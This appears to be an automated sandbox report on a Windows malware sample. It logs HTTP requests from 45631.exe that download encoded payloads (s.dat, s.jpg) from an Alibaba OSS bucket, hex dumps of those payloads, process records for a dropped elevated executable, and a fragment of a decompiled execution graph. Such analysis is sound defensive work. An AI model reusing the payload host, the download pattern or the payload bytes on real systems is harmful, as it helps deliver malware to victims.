c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97
                    Data Ascii: -J;wuwu{}uG`uWu{Q6
                    2025-01-02 11:08:39 UTC4096INData Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79
                    Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
                    2025-01-02 11:08:39 UTC4096INData Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85
                    Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                    2025-01-02 11:08:39 UTC4096INData Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3
                    Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                    2025-01-02 11:08:39 UTC4096INData Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af
                    Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                    2025-01-02 11:08:39 UTC4096INData Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f
                    Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
                    2025-01-02 11:08:39 UTC4096INData Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96
                    Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.54998039.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:45 UTC111OUTGET /s.dat HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:46 UTC560INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:45 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 28272
                    Connection: close
                    x-oss-request-id: 677673BD6AD6D53830023081
                    Accept-Ranges: bytes
                    ETag: "4EC8DE8386092D80236CAFAEF929A784"
                    Last-Modified: Thu, 02 Jan 2025 11:08:24 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 6977863267739028541
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000113
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: Tsjeg4YJLYAjbK+u+SmnhA==
                    x-oss-server-time: 11
                    2025-01-02 11:08:46 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                    Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                    2025-01-02 11:08:46 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                    Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                    2025-01-02 11:08:46 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                    Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                    2025-01-02 11:08:46 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                    Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                    2025-01-02 11:08:46 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                    2025-01-02 11:08:46 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                    Data Ascii: ,$LDld=5}u]U
                    2025-01-02 11:08:46 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                    Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                    2025-01-02 11:08:46 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 84 09 43 ce
                    Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSC


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.54998139.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:47 UTC111OUTGET /s.jpg HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:47 UTC544INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:47 GMT
                    Content-Type: image/jpeg
                    Content-Length: 8299
                    Connection: close
                    x-oss-request-id: 677673BFD4BE2034392D4CCB
                    Accept-Ranges: bytes
                    ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                    Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 692387538176721524
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000104
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                    x-oss-server-time: 17
                    2025-01-02 11:08:47 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                    2025-01-02 11:08:47 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                    Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                    2025-01-02 11:08:47 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                    Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:06:07:00
                    Start date:02/01/2025
                    Path:C:\Users\user\Desktop\45631.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\45631.exe"
                    Imagebase:0x140000000
                    File size:31'614'976 bytes
                    MD5 hash:71FB431D4793BB51CE762DC5D719A730
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:4
                    Start time:06:08:47
                    Start date:02/01/2025
                    Path:C:\Users\user\Documents\eSmF2v.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Documents\eSmF2v.exe
                    Imagebase:0x140000000
                    File size:133'136 bytes
                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 0%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:5
                    Start time:06:09:01
                    Start date:02/01/2025
                    Path:C:\Users\user\Documents\eSmF2v.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Documents\eSmF2v.exe
                    Imagebase:0x140000000
                    File size:133'136 bytes
                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Reset < >

                      Execution Graph

                      Execution Coverage:2.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:32.3%
                      Total number of Nodes:458
                      Total number of Limit Nodes:10
                      execution_graph 14030 140005df3 14031 140005e71 14030->14031 14032 140005e84 CreateFileA 14031->14032 14033 140005f50 _SetThrowImageBase 14032->14033 14034 140005fc3 malloc ReadFile 14033->14034 15443 140007412 15444 140007333 15443->15444 15445 140007403 15444->15445 15446 1400073e0 LdrLoadDll 15444->15446 15446->15444 17383 7ff8bfb211b0 17390 7ff8bfb21209 17383->17390 17384 7ff8bfb214f0 17411 7ff8bfb21a40 17384->17411 17385 7ff8bfb21b70 BuildCatchObjectHelperInternal 8 API calls 17389 7ff8bfb214d3 17385->17389 17386 7ff8bfb21b90 51 API calls 17401 7ff8bfb21300 BuildCatchObjectHelperInternal 17386->17401 17387 7ff8bfb2129e 17392 7ff8bfb214f6 17387->17392 17402 7ff8bfb21b90 17387->17402 17388 7ff8bfb212c7 17393 7ff8bfb21b90 51 API calls 17388->17393 17390->17384 17390->17387 17390->17388 17395 7ff8bfb212b9 BuildCatchObjectHelperInternal 17390->17395 17390->17401 17414 7ff8bfb21110 17392->17414 17393->17395 17395->17386 17399 7ff8bfb214eb 17400 7ff8bfb279cc _invalid_parameter_noinfo_noreturn 47 API calls 17399->17400 17400->17384 17401->17385 17406 7ff8bfb21b9b 17402->17406 17403 7ff8bfb212b0 